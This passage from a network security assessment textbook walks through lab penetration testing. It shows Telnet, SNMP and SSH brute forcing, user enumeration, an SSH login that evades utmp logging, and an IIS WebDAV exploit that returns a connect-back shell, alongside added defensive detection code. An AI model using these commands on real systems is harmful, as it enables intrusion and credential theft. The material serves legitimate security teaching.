14.4 Network Service Testing


After investigating the potential low-level weaknesses within each accessible network service, I launch exploit scripts and attack techniques against each service to qualify and test the vulnerabilities.

14.4.1 Cisco IOS Router (192.168.10.1)

The router is susceptible to brute-force attack through its Telnet and SNMP services. A full-blown brute-force attack (which often takes days to complete) should be launched if initial brute-force attacks, using obvious common passwords, fail. Example 14-17 shows hydra in use to brute-force the Cisco IOS Telnet service password, using a list of default Cisco passwords from pass.txt.

Example 14-17. Performing initial Telnet brute force using Hydra
    # cat pass.txt
    cisco
    enable
    admin
    changeme
    system
    !cisco
    Cisco
    c
    cc
    # ./hydra -P pass.txt -e ns 192.168.10.1 cisco
    Hydra v2.4 (c) 2003 by van Hauser / THC - use allowed only for legal purposes.
    Hydra is starting! [parallel tasks: 4, login tries: 11 (l:1/p:11)]
    Hydra finished.

ADMsnmp is used to brute-force SNMP service read or write community strings of the router, as shown in Example 14-18.

Example 14-18. Performing initial SNMP brute force using ADMsnmp
    # ./ADMsnmp 192.168.10.1
    ADMsnmp vbeta 0.1 (c) The ADM crew
    ftp://ADM.isp.at/ADM/
    greets: !ADM, el8.org, ansia
    >>>>>>>>>>> get req name=root  id = 2 >>>>>>>>>>>
    >>>>>>>>>>> get req name=public   id = 5 >>>>>>>>>>>
    >>>>>>>>>>> get req name=private  id = 8 >>>>>>>>>>>
    >>>>>>>>>>> get req name=write  id = 11 >>>>>>>>>>>
    >>>>>>>>>>> get req name=admin  id = 14 >>>>>>>>>>>
    >>>>>>>>>>> get req name=proxy  id = 17 >>>>>>>>>>>
    >>>>>>>>>>> get req name=ascend  id = 20 >>>>>>>>>>>
    >>>>>>>>>>> get req name=cisco  id = 23 >>>>>>>>>>>
    >>>>>>>>>>> get req name=router  id = 26 >>>>>>>>>>>
    >>>>>>>>>>> get req name=shiva  id = 29 >>>>>>>>>>>
    >>>>>>>>>>> get req name=enable  id = 32 >>>>>>>>>>>
    >>>>>>>>>>> get req name=read  id = 35 >>>>>>>>>>>
    >>>>>>>>>>> get req name=access  id = 38 >>>>>>>>>>>
    >>>>>>>>>>> get req name=snmp  id = 41 >>>>>>>>>>>
    >>>>>>>>>>> get req name=cable-docsis  id = 43 >>>>>>>>>>>
    >>>>>>>>>>> get req name=ILMI  id = 45 >>>>>>>>>>>
    <!ADM!>         snmp check on 192.168.10.1       <!ADM!>

Unfortunately, this initial Telnet and SNMP brute-force testing reveals that no common or default passwords are in use on this router. I could launch a full-blown brute-force attack against these services if I were desperate to compromise this device (which can take weeks to complete, depending on the size of the dictionary).
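Both of these sweeps are visible on the router side: IOS logs each failed Telnet login (when login failure logging is enabled) and each bad community string. As an added example, not from the book, the following Python parses constructed syslog lines in the IOS %SEC_LOGIN-4-LOGIN_FAILED and %SNMP-3-AUTHFAIL formats (timestamps, hosts and addresses are made up) and reports any source that fails against one service three or more times within a minute, which flags both sweeps but not a lone mistyped password.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed syslog lines (not from the book) as a collector would store them:
# a Telnet password-guessing burst and an SNMP community sweep from 10.0.0.10,
# plus one isolated failure from 10.0.0.99 that should not trigger an alert.
SAMPLE_LOG = """\
Nov 20 10:00:01 192.168.10.1 %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.0.0.10] [localport: 23] [Reason: Login Authentication Failed] at 10:00:01 UTC Thu Nov 20 2003
Nov 20 10:00:02 192.168.10.1 %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.0.0.10] [localport: 23] [Reason: Login Authentication Failed] at 10:00:02 UTC Thu Nov 20 2003
Nov 20 10:00:02 192.168.10.1 %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.0.0.10] [localport: 23] [Reason: Login Authentication Failed] at 10:00:02 UTC Thu Nov 20 2003
Nov 20 10:00:03 192.168.10.1 %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.0.0.10] [localport: 23] [Reason: Login Authentication Failed] at 10:00:03 UTC Thu Nov 20 2003
Nov 20 10:00:05 192.168.10.1 %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.0.0.10
Nov 20 10:00:05 192.168.10.1 %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.0.0.10
Nov 20 10:00:06 192.168.10.1 %SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host 10.0.0.10
Nov 20 10:07:30 192.168.10.1 %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: admin] [Source: 10.0.0.99] [localport: 23] [Reason: Login Authentication Failed] at 10:07:30 UTC Thu Nov 20 2003
"""

LINE_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ (%\S+): (.*)$")
LOGIN_SRC = re.compile(r"\[Source: ([\d.]+)\] \[localport: (\d+)\]")
SNMP_SRC = re.compile(r"from host ([\d.]+)")

def parse_failures(log_text):
    """Yield (timestamp, source_ip, service) for every authentication failure."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%b %d %H:%M:%S")
        tag, body = m.group(2), m.group(3)
        if tag == "%SEC_LOGIN-4-LOGIN_FAILED" and (s := LOGIN_SRC.search(body)):
            yield ts, s.group(1), "telnet" if s.group(2) == "23" else "tcp/" + s.group(2)
        elif tag == "%SNMP-3-AUTHFAIL" and (s := SNMP_SRC.search(body)):
            yield ts, s.group(1), "snmp"

def guessing_sources(log_text, threshold=3, window=60):
    """Return {(source_ip, service): total failures} for each source that failed
    against one service `threshold` or more times within `window` seconds."""
    stamps = defaultdict(list)
    for ts, src, service in parse_failures(log_text):
        stamps[(src, service)].append(ts)
    hits = {}
    for key, times in stamps.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= timedelta(seconds=window):
                hits[key] = len(times)
                break
    return hits
```

The same sliding-window logic applies unchanged to sshd "Failed password" lines, which is where the guess-who run later in this section would show up.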

14.4.2 Solaris Mail Server (192.168.10.10)

No public exploit tools were found for the issues listed in MITRE CVE relating to Sendmail and OpenSSH services running on Solaris. In this case, there are three remote attacks that can be launched against the server.

  • Enumeration of local user accounts through Sendmail

  • Enumeration of local user accounts through OpenSSH (abusing CVE-2003-0190)

  • Brute force of weak user passwords through OpenSSH

Example 14-19 shows the rcpt2 tool (http://examples.oreilly.com/networksa/tools/rcpt2.c) in use against the Sendmail service, to identify local user accounts through multiple crafted RCPT TO: requests.

Example 14-19. Enumerating usernames through Sendmail
    # ./rcpt2 users.txt 192.168.10.10
    rcpt2 by B-r00t. (c) 2003.
    Usernames from: users.txt
    RCPT TO username enumeration on 192.168.10.10.
    BANNER: 220 mail ESMTP Sendmail 8.11.6+Sun/8.11.6; Thu, 20 Nov 2003
    SEND: HELO doris.scriptkiddie.net
    RECV: 250 mail Hello hacker [10.0.0.10], pleased to meet you
    SENT: mail from:<hax0r@doris.scriptkiddie.net>
    RECV: 250 2.1.0 <hax0r@doris.scriptkiddie.net>... Sender ok
    VALID_USER: root
    VALID_USER: sybase
    Sending RSET & QUIT to 192.168.10.10
    Ok
    Done!

Here I've identified the user accounts root and sybase. Example 14-20 shows how to launch a similar attack against the OpenSSH service, using ssh_brute.

Example 14-20. Downloading, building, and using ssh_brute
    # wget ftp://sunsite.cnlab-switch.ch/pub/OpenBSD/OpenSSH/portable/openssh-3.6.1p1.tar.gz
    # tar xfz openssh-3.6.1p1.tar.gz
    # wget http://examples.oreilly.com/networksa/tools/ssh_brute.tgz
    # tar xvfz ssh_brute.tgz
    openssh-3.6.1p1_brute.diff
    ssh_brute.c
    # patch -p0 <openssh-3.6.1p1_brute.diff
    patching file openssh-3.6.1p1/ssh.c
    patching file openssh-3.6.1p1/sshconnect.c
    patching file openssh-3.6.1p1/sshconnect1.c
    patching file openssh-3.6.1p1/sshconnect2.c
    # cd openssh-3.6.1p1
    # ./configure
    # make
    # cc ../ssh_brute.c -o ssh_brute
    # ./ssh_brute

    SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
    Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved

    Usage: ./ssh_brute <protocol version> <user file> <host>
    # make ssh
    # ./ssh_brute 2 users.txt 192.168.10.10

    SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
    Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved

    Testing an illegal user        : 0 second(s)
    Testing login root             : USER OK       [8 second(s)]
    Testing login test             : ILLEGAL       [0 second(s)]
    Testing login admin            : ILLEGAL       [0 second(s)]
    Testing login sybase           : USER OK       [7 second(s)]
    Testing login oracle           : ILLEGAL       [1 second(s)]
    Testing login informix         : ILLEGAL       [0 second(s)]
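The 8-second versus 0-second difference in Example 14-20 is the whole of CVE-2003-0190: the unknown-user path returned before any expensive work was done, so response time alone revealed which accounts exist. As an added example, not from the book or from OpenSSH, the following Python contrasts that shape with the fix of always performing the same work; the user database, passwords and PBKDF2 parameters are constructed.

```python
import hashlib
import hmac
import os
import time

# Constructed credentials (not from the book): salted PBKDF2 hashes for the two
# accounts found above. The iteration count only needs to make one check take a
# clearly measurable time, standing in for the slow PAM conversation on Solaris.
ROUNDS = 200_000

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)

_SALT = {"root": os.urandom(16), "sybase": os.urandom(16)}
USERS = {"root": _hash("correct-horse-battery", _SALT["root"]),
         "sybase": _hash("letmein", _SALT["sybase"])}
# Dummy credential checked for unknown users so that both paths cost the same.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash("never-a-real-password", _DUMMY_SALT)

def leaky_auth(user, password):
    """Pre-fix shape: an unknown user is rejected before the expensive check,
    so response time alone tells the caller whether the account exists."""
    if user not in USERS:
        return False
    return hmac.compare_digest(_hash(password, _SALT[user]), USERS[user])

def uniform_auth(user, password):
    """Fixed shape: unknown users are checked against the dummy credential and
    the result discarded, so both outcomes take the full hashing time."""
    if user in USERS:
        salt, expected, known = _SALT[user], USERS[user], True
    else:
        salt, expected, known = _DUMMY_SALT, _DUMMY_HASH, False
    match = hmac.compare_digest(_hash(password, salt), expected)
    return match and known

def timed(auth, user, password):
    """Return (accepted, elapsed_seconds) for one login attempt."""
    start = time.perf_counter()
    accepted = auth(user, password)
    return accepted, time.perf_counter() - start

if __name__ == "__main__":
    for auth in (leaky_auth, uniform_auth):
        for user in ("root", "nosuchuser"):
            accepted, dt = timed(auth, user, "wrong-password")
            print("%-12s %-11s accepted=%-5s %.3f s" % (auth.__name__, user, accepted, dt))
```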

After identifying one interesting non-standard user account in particular (sybase), I proceed to use the TESO guess-who brute-force utility to grind the user password through the accessible SSH service. Example 14-21 shows the package being downloaded, built, and run.

Example 14-21. Installing and using guess-who
    # wget http://packetstormsecurity.nl/groups/teso/guess-who-0.44.tgz
    # tar xfz guess-who-0.44.tgz
    # cd guess-who
    # make
    # ./b
    guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer
    Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads]
               [-n ntries]
    Use -1 for producer/consumer thread model, -2 for dumb parallelism.
    Passwds go on stdin. :)
    # ./b -l sybase -h 192.168.10.10 -1 < pass.txt
    (!)128 ][ 00131 ][ 00000000.599880 ][   sybase ][        letmein ]

After 128 attempts, the tool finds that the user password is letmein. I can proceed to use ssh to authenticate and connect to the host, with the -T option (which disables pseudo-terminal allocation) to provide a level of cloaking: a session without a tty isn't recorded in utmp, so it doesn't appear in who listings and the like:

    # ssh -l sybase -T 192.168.10.10 csh -i
    sybase@192.168.10.10's password: letmein
    Warning: no access to tty (Bad file descriptor).
    Thus no job control in this shell.
    mail% who
    mail% id
    uid=508(sybase) gid=509(sybase) groups=509(sybase)

14.4.3 Windows 2000 Web Server (192.168.10.25)

Vulnerabilities fall into two categories: simple logic flaws and memory manipulation bugs. Two of the seven relevant remote issues relating to IIS 5.0 are simple logic flaws that rely on Unicode and double-encoding of characters to perform directory traversal. The remaining five are memory manipulation bugs, which use buffer overflows to influence logical program flow on the remote server.

The Unicode and double-encoding directory traversal bugs (CVE-2000-0884 and CVE-2001-0333) can be identified using an automated web scanner, such as nikto or N-Stealth. By analyzing the results, I find that the server isn't susceptible to these issues.
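Because both logic flaws are decoding problems, the check a defender can run over web logs is the same normalization the vulnerable decoder performed, followed by a look at where the resulting path lands. As an added example, not from the book, the following Python undoes nested percent-encoding and two-byte overlong UTF-8, resolves the path and reports why a request is suspicious; the sample paths are constructed and use win.ini only as a harmless target file.

```python
from urllib.parse import unquote_to_bytes

# Constructed request paths (not from the book): a plain request, an overlong
# UTF-8 traversal of the CVE-2000-0884 kind, a double-encoded traversal of the
# CVE-2001-0333 kind, and a %2e%2e that resolves back inside the web root.
SAMPLE_PATHS = [
    "/scripts/ssi.dll",
    "/scripts/..%c0%af..%c0%afwinnt/win.ini",
    "/scripts/..%255c..%255cwinnt/win.ini",
    "/scripts/%2e%2e/scripts/ssi.dll",
]

def percent_decode_all(path, max_layers=3):
    """Percent-decode until stable so %255c -> %5c -> \\ is undone; returns (bytes, layers removed)."""
    data, layers = path.encode("latin-1"), 0
    for _ in range(max_layers):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, layers = decoded, layers + 1
    return data, layers

def decode_overlong_utf8(data):
    """Collapse two-byte overlong UTF-8 (lead C0/C1, e.g. C0 AF for '/') to the ASCII byte it encodes."""
    out, i = bytearray(), 0
    while i < len(data):
        lead = data[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((lead & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out)

def analyse(path):
    """Return (normalized path, reasons); reasons is empty for a clean request."""
    raw, layers = percent_decode_all(path)
    flat = decode_overlong_utf8(raw)
    reasons = ["double-encoded"] if layers >= 2 else []
    if flat != raw:
        reasons.append("overlong-utf8")
    stack = []
    for seg in flat.decode("latin-1").replace("\\", "/").split("/"):
        if seg == "..":
            if stack:
                stack.pop()
            elif "escapes-root" not in reasons:
                reasons.append("escapes-root")
        elif seg not in ("", "."):
            stack.append(seg)
    return "/" + "/".join(stack), reasons
```

The last sample path shows why a naive search for ".." is not enough: it decodes to a dot-dot but resolves back inside /scripts and is not flagged.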

The existence and scope of memory manipulation bugs can be fully qualified only by launching exploit scripts and proof-of-concept tools to solicit a positive response (such as an interactive command shell or a directory listing). It may be the case that, even though the server is vulnerable to a given bug, egress filtering of traffic prevents connect-back shellcode from working.

In the case of the IIS 5.0 web service at 192.168.10.25, the exploit scripts for the following bugs weren't successful:

  • .printer overflow

  • .ida and .idq overflow

  • .asp chunked encoding overflow

When running the KaHT exploit script to test for the presence of the ntdll.dll IIS WebDAV overflow, I see a positive response, as shown in Example 14-22.

Example 14-22. Using KaHT to compromise the IIS 5.0 server
    D:\KaHT_public> KaHT 10.0.0.10 53 0 192.168.10.25
    . .. ...: Webdav exploit & Scanner (aT4r@3wdesign.es) :... ...

    Checking Servers.
    IP                 Connect IIS 5.0 WEBDAV
    Connecting to host: 192.168.10.25...   [OK]    [OK]    [OK]

    [+] Aceptando conexiones en el puerto 53
    [+] Lets go dude =)
    [+] 1 Unhacked Servers Remaining
    [+] Trying Ip: 192.168.10.25      Ret=0x00c000c0
    [+] Trying Ip: 192.168.10.25      Ret=0x00c200c2
    [+] Incoming Conection from 192.168.10.25 accepted
    [+] Press Enter to Continue. type "exit" to return to scan

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>

Network Security Assessment: Know Your Network
ISBN: 059600611X
Year: 2006
Pages: 166
Authors: Chris McNab